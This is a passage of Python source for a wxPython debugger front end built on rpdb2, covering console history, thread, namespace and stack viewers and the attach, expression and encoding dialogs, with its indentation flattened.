if ce != '' and ce.split()[0] in ['v', 'eval', 'x', 'exec']:
completions = [re.split('\W+', c)[-1] for c in completions]
if completions == self.m_completions:
return
self.m_completions = completions
out = ', '.join(completions)
lines = textwrap.wrap(out, 60)
text = '\n'.join(lines) + '\n'
self.m_console_out.write(CONSOLE_COMPLETIONS % text)
def OnSendText(self, event):
self.m_completions = None
value = self.m_console_in.GetValue()
self.set_history(value)
self.m_console_out.write(CONSOLE_PROMPT + value + '\n')
self.m_console_in.Clear()
if value in ['exit', 'EOF']:
self.m_exit_command()
return
value = rpdb2.as_unicode(value, wx.GetDefaultPyEncoding())
self.m_queue.put(value + '\n')
def get_history(self, fBack, value = None):
if fBack:
index = self.m_history_index_up
else:
index = self.m_history_index_down
if (value is not None) and (value != self.m_history[index]):
self.m_history[0] = value
self.m_history_index_up = 0
self.m_history_index_errors = 0
try:
if fBack:
self.m_history_index_up = self.find_next_up()
self.m_history_index_down = self.m_history_index_up
else:
self.m_history_index_down = self.find_next_down()
self.m_history_index_up = self.m_history_index_down
except KeyError:
if self.m_history_index_errors == 3:
self.m_history_index_errors += 1
return self.get_history(fBack, value)
return self.m_history[self.m_history_index_up]
def find_next_up(self):
if self.m_history_index_up >= len(self.m_history) - 1:
raise KeyError
if self.m_history_index_errors >= 3:
prefix = ''
else:
prefix = self.m_history[0]
index = self.m_history_index_up
current = self.m_history[index]
while True:
index += 1
if index >= len(self.m_history):
self.m_history_index_errors += 1
raise KeyError
next = self.m_history[index]
if next != current and next.startswith(prefix):
break
if self.m_history_index_errors < 3:
self.m_history_index_errors = 0
return index
def find_next_down(self):
if self.m_history_index_errors < 3:
self.m_history_index_errors = 0
if self.m_history_index_errors >= 3:
prefix = ''
else:
prefix = self.m_history[0]
index = self.m_history_index_down
current = self.m_history[index]
while True:
index -= 1
if index < 0:
raise KeyError
next = self.m_history[index]
if next != current and next.startswith(prefix):
return index
def set_history(self, value):
self.m_history[0] = ''
self.m_history_index_up = 0
if value != '' and (len(self.m_history) <= 1 or value != self.m_history[1]):
self.m_history.insert(1, value)
self.m_history = self.m_history[:50]
if self.m_history_index_down != 0:
self.m_history_index_down = min(self.m_history_index_down + 1, len(self.m_history) - 1)
class CThreadsViewer(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_select_command = kwargs.pop('select_command', None)
wx.Panel.__init__(self, *args, **kwargs)
self.m_suppress_recursion = 0
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_THREADS)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_threads = CListCtrl(parent = self, style = wx.LC_REPORT | wx.LC_SINGLE_SEL)
self.bind_caption(self.m_threads)
self.m_threads.InsertColumn(0, HLIST_HEADER_TID + ' ')
self.m_threads.InsertColumn(1, HLIST_HEADER_NAME)
self.m_threads.InsertColumn(2, HLIST_HEADER_STATE)
sizerv.Add(self.m_threads, 1, wx.EXPAND | wx.ALL, 0)
if self.m_select_command:
self.m_threads.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnThreadSelected)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_threads.SetCursor(cursor)
def _clear(self):
self.m_threads.DeleteAllItems()
self.m_threads.Disable()
def _disable(self):
self.m_threads.Disable()
def _enable(self):
self.m_threads.Enable()
def is_selected(self, index):
return self.m_threads.IsSelected(index)
def update_thread(self, thread_id, thread_name, fBroken):
assert(rpdb2.is_unicode(thread_name))
index = self.m_threads.FindItemData(-1, thread_id)
if index < 0:
return -1
if not g_fUnicode:
thread_name = rpdb2.as_string(thread_name, wx.GetDefaultPyEncoding())
self.m_threads.SetStringItem(index, 1, thread_name)
self.m_threads.SetStringItem(index, 2, [rpdb2.STATE_RUNNING, rpdb2.STR_STATE_BROKEN][fBroken])
return index
def update_threads_list(self, current_thread, threads_list):
if self.m_suppress_recursion > 0:
self.m_suppress_recursion -= 1
return
self.m_threads.DeleteAllItems()
j = None
for i, s in enumerate(threads_list):
tid = s[rpdb2.DICT_KEY_TID]
name = s[rpdb2.DICT_KEY_NAME]
if not g_fUnicode:
name = rpdb2.as_string(name, wx.GetDefaultPyEncoding())
fBroken = s[rpdb2.DICT_KEY_BROKEN]
index = self.m_threads.InsertStringItem(sys.maxint, repr(tid))
self.m_threads.SetStringItem(index, 1, name)
self.m_threads.SetStringItem(index, 2, [rpdb2.STATE_RUNNING, rpdb2.STR_STATE_BROKEN][fBroken])
self.m_threads.SetItemData(index, tid)
if tid == current_thread:
j = i
self.m_threads.set_columns_width()
if j is not None:
self.m_suppress_recursion += 1
self.m_threads.Select(j)
def OnThreadSelected(self, event):
if self.m_suppress_recursion == 0:
self.m_suppress_recursion += 1
index = event.m_itemIndex
tid = self.m_threads.GetItemData(index)
self.m_select_command(tid)
else:
self.m_suppress_recursion -= 1
event.Skip()
class CNamespacePanel(wx.Panel, CJobs):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
wx.Panel.__init__(self, *args, **kwargs)
CJobs.__init__(self)
self.init_jobs()
self.m_async_sm = CAsyncSessionManager(self.m_session_manager, self)
self.m_lock = threading.RLock()
self.m_jobs = []
self.m_n_workers = 0
self.m_filter_level = 0
self.m_key = None
sizerv = wx.BoxSizer(wx.VERTICAL)
self.m_tree = wx.gizmos.TreeListCtrl(self, -1, style = wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.TR_FULL_ROW_HIGHLIGHT | wx.NO_BORDER)
self.m_tree.AddColumn(TLC_HEADER_NAME)
self.m_tree.AddColumn(TLC_HEADER_TYPE)
self.m_tree.AddColumn(TLC_HEADER_REPR)
self.m_tree.SetColumnWidth(2, 800)
self.m_tree.SetMainColumn(0)
self.m_tree.SetLineSpacing(0)
self.m_tree.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.OnItemExpanding)
self.m_tree.Bind(wx.EVT_TREE_ITEM_COLLAPSING, self.OnItemCollapsing)
self.m_tree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnItemActivated)
try:
self.m_tree.Bind(wx.EVT_TREE_ITEM_GETTOOLTIP, self.OnItemToolTip)
except:
pass
self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroyWindow)
sizerv.Add(self.m_tree, flag = wx.GROW, proportion = 1)
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnDestroyWindow(self, event):
self.shutdown_jobs()
def _clear(self):
self.m_tree.DeleteAllItems()
def set_filter(self, filter_level):
self.m_filter_level = filter_level
def bind_caption(self, caption_manager):
w = self.m_tree.GetMainWindow()
caption_manager.bind_caption(w)
def OnItemActivated(self, event):
item = event.GetItem()
(expr, is_valid) = self.m_tree.GetPyData(item)
if expr in [STR_NAMESPACE_LOADING, STR_NAMESPACE_DEADLOCK, rpdb2.STR_MAX_NAMESPACE_WARNING_TITLE]:
return
if is_valid:
default_value = self.m_tree.GetItemText(item, 2)[1:]
else:
default_value = ''
expr_dialog = CExpressionDialog(self, default_value)
pos = self.GetPositionTuple()
expr_dialog.SetPosition((pos[0] + 50, pos[1] + 50))
r = expr_dialog.ShowModal()
if r != wx.ID_OK:
expr_dialog.Destroy()
return
_expr = expr_dialog.get_expression()
expr_dialog.Destroy()
_suite = "%s = %s" % (expr, _expr)
self.m_async_sm.with_callback(self.callback_execute).execute(_suite)
def callback_execute(self, r, exc_info):
(t, v, tb) = exc_info
if t != None:
rpdb2.print_exception(t, b, tb)
return
(warning, error) = r
if error != '':
dlg = wx.MessageDialog(self, error, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
if not warning in g_ignored_warnings:
dlg = wx.MessageDialog(self, MSG_WARNING_TEMPLATE % (warning, ), MSG_WARNING_TITLE, wx.OK | wx.CANCEL | wx.YES_DEFAULT | wx.ICON_WARNING)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_CANCEL:
g_ignored_warnings[warning] = True
def OnItemToolTip(self, event):
item = event.GetItem()
tt = self.m_tree.GetItemText(item, 2)[1:]
event.SetToolTip(tt)
def OnItemCollapsing(self, event):
item = event.GetItem()
event.Skip()
def GetChildrenCount(self, item):
n = self.m_tree.GetChildrenCount(item)
if n != 1:
return n
child = self.get_children(item)[0]
(expr, is_valid) = self.m_tree.GetPyData(child)
if expr in [STR_NAMESPACE_LOADING, STR_NAMESPACE_DEADLOCK]:
return 0
return 1
def expand_item(self, item, _map, froot = False, fskip_expansion_check = False):
if not self.m_tree.ItemHasChildren(item):
return
if not froot and not fskip_expansion_check and self.m_tree.IsExpanded(item):
return
if self.GetChildrenCount(item) > 0:
return
(expr, is_valid) = self.m_tree.GetPyData(item)
l = [e for e in _map if e.get(rpdb2.DICT_KEY_EXPR, None) == expr]
if l == []:
return None
_r = l[0]
if _r is None:
return
if rpdb2.DICT_KEY_ERROR in _r:
return
if _r[rpdb2.DICT_KEY_N_SUBNODES] == 0:
self.m_tree.SetItemHasChildren(item, False)
return
#
# Create a list of the subitems.
# The list is indexed by name or directory key.
# In case of a list, no sorting is needed.
#
snl = _r[rpdb2.DICT_KEY_SUBNODES]
for r in snl:
if g_fUnicode:
_name = r[rpdb2.DICT_KEY_NAME]
_type = r[rpdb2.DICT_KEY_TYPE]
_repr = r[rpdb2.DICT_KEY_REPR]
else:
_name = rpdb2.as_string(r[rpdb2.DICT_KEY_NAME], wx.GetDefaultPyEncoding())
_type = rpdb2.as_string(r[rpdb2.DICT_KEY_TYPE], wx.GetDefaultPyEncoding())
_repr = rpdb2.as_string(r[rpdb2.DICT_KEY_REPR], wx.GetDefaultPyEncoding())
identation = ''
#identation = ['', ' '][os.name == rpdb2.POSIX and r[rpdb2.DICT_KEY_N_SUBNODES] == 0]
child = self.m_tree.AppendItem(item, identation + _name)
self.m_tree.SetItemText(child, ' ' + _repr, 2)
self.m_tree.SetItemText(child, ' ' + _type, 1)
self.m_tree.SetItemPyData(child, (r[rpdb2.DICT_KEY_EXPR], r[rpdb2.DICT_KEY_IS_VALID]))
self.m_tree.SetItemHasChildren(child, (r[rpdb2.DICT_KEY_N_SUBNODES] > 0))
self.m_tree.Expand(item)
def OnItemExpanding(self, event):
item = event.GetItem()
if not self.m_tree.ItemHasChildren(item):
event.Skip()
return
if self.GetChildrenCount(item) > 0:
event.Skip()
self.m_tree.Refresh();
return
self.m_tree.DeleteChildren(item)
child = self.m_tree.AppendItem(item, STR_NAMESPACE_LOADING)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_LOADING, 2)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_LOADING, 1)
self.m_tree.SetItemPyData(child, (STR_NAMESPACE_LOADING, False))
(expr, is_valid) = self.m_tree.GetPyData(item)
f = lambda r, exc_info: self.callback_ns(r, exc_info, expr)
self.m_async_sm.with_callback(f).get_namespace([(expr, True)], self.m_filter_level)
event.Skip()
def callback_ns(self, r, exc_info, expr):
(t, v, tb) = exc_info
item = self.find_item(expr)
if item == None:
return
#
# When expanding a tree item with arrow-keys on wxPython 2.6, the
# temporary "loading" child is automatically selected. After
# replacement with real children we need to reselect the first child.
#
cl = self.get_children(item)
freselect_child = len(cl) != 0 and cl[0] == self.m_tree.GetSelection()
self.m_tree.DeleteChildren(item)
if t != None or r is None or len(r) == 0:
child = self.m_tree.AppendItem(item, STR_NAMESPACE_DEADLOCK)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_DEADLOCK, 2)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_DEADLOCK, 1)
self.m_tree.SetItemPyData(child, (STR_NAMESPACE_DEADLOCK, False))
self.m_tree.Expand(item)
if freselect_child:
self.m_tree.SelectItem(child)
return
self.expand_item(item, r, False, True)
if freselect_child:
cl = self.get_children(item)
self.m_tree.SelectItem(cl[0])
self.m_tree.Refresh()
def find_item(self, expr):
item = self.m_tree.GetRootItem()
while item:
(expr2, is_valid) = self.m_tree.GetPyData(item)
if expr2 == expr:
return item
item = self.m_tree.GetNext(item)
return None
def get_children(self, item):
(child, cookie) = self.m_tree.GetFirstChild(item)
cl = []
while child and child.IsOk():
cl.append(child)
(child, cookie) = self.m_tree.GetNextChild(item, cookie)
return cl
def get_expression_list(self):
if self.m_tree.GetCount() == 0:
return None
item = self.m_tree.GetRootItem()
s = [item]
el = []
while len(s) > 0:
item = s.pop(0)
(expr, is_valid) = self.m_tree.GetPyData(item)
fExpand = self.m_tree.IsExpanded(item) and self.GetChildrenCount(item) > 0
if not fExpand:
continue
el.append((expr, True))
items = self.get_children(item)
s = items + s
return el
def update_namespace(self, key, el):
old_key = self.m_key
old_el = self.get_expression_list()
if key == old_key:
el = old_el
self.m_key = key
if el is None:
el = [(self.get_root_expr(), True)]
self.post(el, self.m_filter_level)
return (old_key, old_el)
def post(self, el, filter_level):
self.m_jobs.insert(0, (el, filter_level))
if self.m_n_workers == 0:
self.job_post(self.job_update_namespace, ())
def job_update_namespace(self):
while len(self.m_jobs) > 0:
self.m_lock.acquire()
self.m_n_workers += 1
self.m_lock.release()
try:
del self.m_jobs[1:]
(el, filter_level) = self.m_jobs.pop()
rl = self.m_session_manager.get_namespace(el, filter_level)
wx.CallAfter(self.do_update_namespace, rl)
except (rpdb2.ThreadDone, rpdb2.NoThreads):
wx.CallAfter(self.m_tree.DeleteAllItems)
except:
rpdb2.print_debug_exception()
self.m_lock.acquire()
self.m_n_workers -= 1
self.m_lock.release()
def do_update_namespace(self, rl):
self.m_tree.DeleteAllItems()
root = self.m_tree.AddRoot('root')
self.m_tree.SetItemPyData(root, (self.get_root_expr(), False))
self.m_tree.SetItemHasChildren(root, True)
s = [root]
while len(s) > 0:
item = s.pop(0)
self.expand_item(item, rl, item is root)
items = self.get_children(item)
s = items + s
self.m_tree.Refresh()
def get_root_expr(self):
"""
Over-ride in derived classes
"""
pass
class CLocals(CNamespacePanel):
def get_root_expr(self):
return rpdb2.as_unicode('locals()')
class CGlobals(CNamespacePanel):
def get_root_expr(self):
return rpdb2.as_unicode('globals()')
class CException(CNamespacePanel):
def get_root_expr(self):
return rpdb2.RPDB_EXEC_INFO
class CNamespaceViewer(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
self.m_key_map = {}
wx.Panel.__init__(self, *args, **kwargs)
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_NAMESPACE)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_notebook = wx.Notebook(self)
self.m_locals = CLocals(self.m_notebook, session_manager = self.m_session_manager)
self.m_notebook.AddPage(self.m_locals, "Locals")
self.m_globals = CGlobals(self.m_notebook, session_manager = self.m_session_manager)
self.m_notebook.AddPage(self.m_globals, "Globals")
self.m_exception = CException(self.m_notebook, session_manager = self.m_session_manager)
self.m_notebook.AddPage(self.m_exception, "Exception")
self.bind_caption(self.m_notebook)
self.m_locals.bind_caption(self)
self.m_globals.bind_caption(self)
self.m_exception.bind_caption(self)
sizerv.Add(self.m_notebook, 1, wx.EXPAND | wx.ALL, 0)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def _clear(self):
self.m_locals._clear()
self.m_globals._clear()
self.m_exception._clear()
def _disable(self):
self.m_notebook.Disable()
self.m_locals.Disable()
self.m_globals.Disable()
self.m_exception.Disable()
def _enable(self):
self.m_notebook.Enable()
self.m_locals.Enable()
self.m_globals.Enable()
self.m_exception.Enable()
def set_filter(self, filter_level):
self.m_locals.set_filter(filter_level)
self.m_globals.set_filter(filter_level)
self.m_exception.set_filter(filter_level)
def get_local_key(self, _stack):
frame_index = self.m_session_manager.get_frame_index()
c = _stack.get(rpdb2.DICT_KEY_CODE_LIST, [])
key = c[-(1 + frame_index)]
return key
def get_global_key(self, _stack):
frame_index = self.m_session_manager.get_frame_index()
s = _stack.get(rpdb2.DICT_KEY_STACK, [])
key = s[-(1 + frame_index)][0]
return key
def update_namespace(self, _stack):
try:
key = self.get_local_key(_stack)
el = self.m_key_map.get(key, None)
(key0, el0) = self.m_locals.update_namespace(key, el)
self.m_key_map[key0] = el0
key = self.get_global_key(_stack)
el = self.m_key_map.get(key, None)
(key1, el1) = self.m_globals.update_namespace(key, el)
self.m_key_map[key1] = el1
key = 'exception'
el = self.m_key_map.get(key, None)
(key1, el1) = self.m_exception.update_namespace(key, el)
self.m_key_map[key] = el1
except rpdb2.NotAttached:
return
class CStackViewer(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_select_command = kwargs.pop('select_command', None)
wx.Panel.__init__(self, *args, **kwargs)
self.m_suppress_recursion = 0
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_STACK)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_stack = CListCtrl(parent = self, style = wx.LC_REPORT | wx.LC_SINGLE_SEL)
self.bind_caption(self.m_stack)
self.m_stack.InsertColumn(0, HLIST_HEADER_FRAME)
self.m_stack.InsertColumn(1, HLIST_HEADER_FILENAME)
self.m_stack.InsertColumn(2, HLIST_HEADER_LINENO)
self.m_stack.InsertColumn(3, HLIST_HEADER_FUNCTION)
self.m_stack.InsertColumn(4, HLIST_HEADER_PATH)
sizerv.Add(self.m_stack, 1, wx.EXPAND | wx.ALL, 0)
if self.m_select_command:
self.m_stack.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnFrameSelected)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_stack.SetCursor(cursor)
def _clear(self):
self.m_stack.DeleteAllItems()
def _disable(self):
self.m_stack.Disable()
def _enable(self):
self.m_stack.Enable()
def is_selected(self, index):
return self.m_stack.IsSelected(index)
def update_stack_list(self, st):
self.m_stack.DeleteAllItems()
s = st.get(rpdb2.DICT_KEY_STACK, [])
i = 0
while i < len(s):
e = s[-(1 + i)]
filename = e[0]
lineno = e[1]
function = e[2]
if not g_fUnicode:
filename = rpdb2.as_string(filename, wx.GetDefaultPyEncoding())
function = rpdb2.as_string(function, wx.GetDefaultPyEncoding())
index = self.m_stack.InsertStringItem(sys.maxint, repr(i))
self.m_stack.SetStringItem(index, 1, os.path.basename(filename))
self.m_stack.SetStringItem(index, 2, repr(lineno))
self.m_stack.SetStringItem(index, 3, function)
self.m_stack.SetStringItem(index, 4, os.path.dirname(filename))
self.m_stack.SetItemData(index, i)
i += 1
self.m_stack.set_columns_width()
self.m_suppress_recursion += 1
self.m_stack.Select(0)
def select_frame(self, index):
if self.m_suppress_recursion > 0:
self.m_suppress_recursion -= 1
return
if (index < 0) or (index > self.m_stack.GetItemCount()):
return
if self.m_stack.IsSelected(index):
return
self.m_suppress_recursion += 1
self.m_stack.Select(index)
def OnFrameSelected(self, event):
if self.m_suppress_recursion == 0:
self.m_suppress_recursion += 1
self.m_select_command(event)
else:
self.m_suppress_recursion -= 1
event.Skip()
class CHTMLDialog(wx.Dialog):
def __init__(self, parent, title, text):
wx.Dialog.__init__(self, parent, -1, title)
sizerv = wx.BoxSizer(wx.VERTICAL)
self.m_html = wx.html.HtmlWindow(self, -1, size = (600, -1))
sizerv.Add(self.m_html, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if "gtk2" in wx.PlatformInfo:
self.m_html.SetStandardFonts()
self.m_html.SetPage(self.get_html_text(text))
ir = self.m_html.GetInternalRepresentation()
self.m_html.SetSize((ir.GetWidth() + 25, min(500, ir.GetHeight() + 25)))
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
btnsizer.AddButton(self.m_ok)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
self.CentreOnParent(wx.BOTH)
def get_html_text(self, text):
tl = text.split('\n')
t = '<br>'.join(tl)
return ABOUT_HTML_PREFIX + t + ABOUT_HTML_SUFFIX
class CListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):
def __init__(self, *args, **kwargs):
wx.ListCtrl.__init__(self, *args, **kwargs)
listmix.ListCtrlAutoWidthMixin.__init__(self)
def set_columns_width(self):
n = self.GetColumnCount()
for i in range(0, n - 1):
self.SetColumnWidth(i, wx.LIST_AUTOSIZE_USEHEADER)
if wx.Platform != '__WXMSW__':
a = [self.GetColumnWidth(i) for i in range(0, n - 1)]
for i in range(0, n - 1):
self.SetColumnWidth(i, wx.LIST_AUTOSIZE)
b = [self.GetColumnWidth(i) for i in range(0, n - 1)]
c = [max(i) for i in zip(a, b)]
for i in range(0, n - 1):
self.SetColumnWidth(i, c[i])
self.resizeLastColumn(50)
class CAttachDialog(wx.Dialog, CJobs):
def __init__(self, parent, session_manager):
wx.Dialog.__init__(self, parent, -1, DLG_ATTACH_TITLE)
CJobs.__init__(self)
self.init_jobs()
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.m_session_manager = session_manager
self.m_async_sm = CAsyncSessionManager(self.m_session_manager, self)
self.m_server_list = None
self.m_errors = {}
self.m_index = None
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_ATTACH_DESC, size = (350, -1))
try:
label.Wrap(350)
except:
label.SetLabel(STATIC_ATTACH_DESC_SPLIT)
sizerv.Add(label, 0, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_ATTACH_HOST)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
host = self.m_session_manager.get_host()
self.m_entry_host = wx.TextCtrl(self, value = host, size = (200, -1))
self.m_entry_host.SetFocus()
sizerh.Add(self.m_entry_host, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btn = wx.Button(self, label = BUTTON_ATTACH_REFRESH)
self.Bind(wx.EVT_BUTTON, self.do_refresh, btn)
btn.SetDefault()
sizerh.Add(btn, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_listbox_scripts = CListCtrl(parent = self, style = wx.LC_REPORT | wx.LC_SINGLE_SEL, size = (-1, 300))
self.m_listbox_scripts.InsertColumn(0, HLIST_HEADER_PID + ' ')
self.m_listbox_scripts.InsertColumn(1, HLIST_HEADER_FILENAME)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected, self.m_listbox_scripts)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected, self.m_listbox_scripts)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnItemActivated, self.m_listbox_scripts)
sizerv.Add(self.m_listbox_scripts, 0, wx.EXPAND | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
wx.CallAfter(self.init2)
def init2(self):
pwd = self.m_session_manager.get_password()
if pwd is not None:
self.do_refresh()
return
pwd_dialog = CPwdDialog(self, pwd)
pos = self.GetPositionTuple()
pwd_dialog.SetPosition((pos[0] + 50, pos[1] + 50))
r = pwd_dialog.ShowModal()
if r != wx.ID_OK:
pwd_dialog.Destroy()
self.Close()
return
pwd = pwd_dialog.get_password()
pwd_dialog.Destroy()
try:
self.m_session_manager.set_password(pwd)
except rpdb2.AlreadyAttached:
assert(0)
self.Close()
return
self.do_refresh()
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_listbox_scripts.SetCursor(cursor)
def OnCloseWindow(self, event):
self.shutdown_jobs()
event.Skip()
def get_server(self):
return self.m_server_list[self.m_index]
def do_refresh(self, event = None):
host = self.m_entry_host.GetValue()
if host == '':
host = 'localhost'
host = rpdb2.as_unicode(host, wx.GetDefaultPyEncoding())
f = lambda r, exc_info: self.callback_sethost(r, exc_info, host)
self.m_async_sm.with_callback(f).set_host(host)
def callback_sethost(self, r, exc_info, host):
(t, v, tb) = exc_info
if t == socket.gaierror:
dlg = wx.MessageDialog(self, rpdb2.MSG_ERROR_HOST_TEXT % (host, v), MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
host = self.m_session_manager.get_host()
self.m_entry_host.SetValue(host)
return
elif t != None:
self.m_session_manager.report_exception(t, v, tb)
return
self.m_async_sm.with_callback(self.update_body).calc_server_list()
def update_body(self, r, exc_info):
(t, v, tb) = exc_info
if t != None:
if t == rpdb2.FirewallBlock:
dlg = wx.MessageDialog(self, rpdb2.STR_FIREWALL_BLOCK, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
self.m_session_manager.report_exception(t, v, tb)
return
(self.m_server_list, self.m_errors) = r
if len(self.m_errors) > 0:
for k, el in self.m_errors.items():
if k in [rpdb2.AuthenticationBadData, rpdb2.AuthenticationFailure]:
self.report_attach_warning(rpdb2.STR_ACCESS_DENIED)
elif k == rpdb2.EncryptionNotSupported:
self.report_attach_warning(rpdb2.STR_DEBUGGEE_NO_ENCRYPTION)
elif k == rpdb2.EncryptionExpected:
self.report_attach_warning(rpdb2.STR_ENCRYPTION_EXPECTED)
elif k == rpdb2.BadVersion:
for (t, v, tb) in el:
self.report_attach_warning(rpdb2.STR_BAD_VERSION % {'value': v})
self.m_ok.Disable()
host = self.m_session_manager.get_host()
self.m_entry_host.SetValue(host)
self.m_listbox_scripts.DeleteAllItems()
for i, s in enumerate(self.m_server_list):
index = self.m_listbox_scripts.InsertStringItem(sys.maxint, repr(s.m_pid))
filename = s.m_filename
if not g_fUnicode:
filename = rpdb2.as_string(filename, wx.GetDefaultPyEncoding())
self.m_listbox_scripts.SetStringItem(index, 1, filename)
self.m_listbox_scripts.SetItemData(index, i)
self.m_listbox_scripts.set_columns_width()
def report_attach_warning(self, warning):
dlg = wx.MessageDialog(self, warning, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
def OnItemSelected(self, event):
self.m_index = event.m_itemIndex
self.m_ok.Enable()
event.Skip()
def OnItemDeselected(self, event):
if self.m_listbox_scripts.GetSelectedItemCount() == 0:
self.m_ok.Disable()
event.Skip()
def OnItemActivated(self, event):
self.m_index = event.m_itemIndex
self.EndModal(wx.ID_OK)
class CExpressionDialog(wx.Dialog):
def __init__(self, parent, default_value):
wx.Dialog.__init__(self, parent, -1, DLG_EXPR_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_EXPR)
sizerv.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_EXPR)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if not g_fUnicode:
default_value = rpdb2.as_string(default_value, wx.GetDefaultPyEncoding())
self.m_entry_expr = wx.TextCtrl(self, value = default_value, size = (200, -1))
self.m_entry_expr.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_expr)
sizerh.Add(self.m_entry_expr, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def get_expression(self):
expr = self.m_entry_expr.GetValue()
expr = rpdb2.as_unicode(expr, wx.GetDefaultPyEncoding())
return expr
class CEncodingDialog(wx.Dialog):
def __init__(self, parent, current_encoding, current_fraw):
wx.Dialog.__init__(self, parent, -1, DLG_ENCODING_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_ENCODING, size = (300, -1))
try:
label.Wrap(300)
except:
label.SetLabel(STATIC_ENCODING_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_ENCODING)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
encoding = [current_encoding, ''][current_encoding is None]
if not g_fUnicode:
encoding = rpdb2.as_string(encoding, wx.GetDefaultPyEncoding())
self.m_entry_encoding = wx.TextCtrl(self, value = encoding, size = (200, -1))
self.m_entry_encoding.SetFocus()
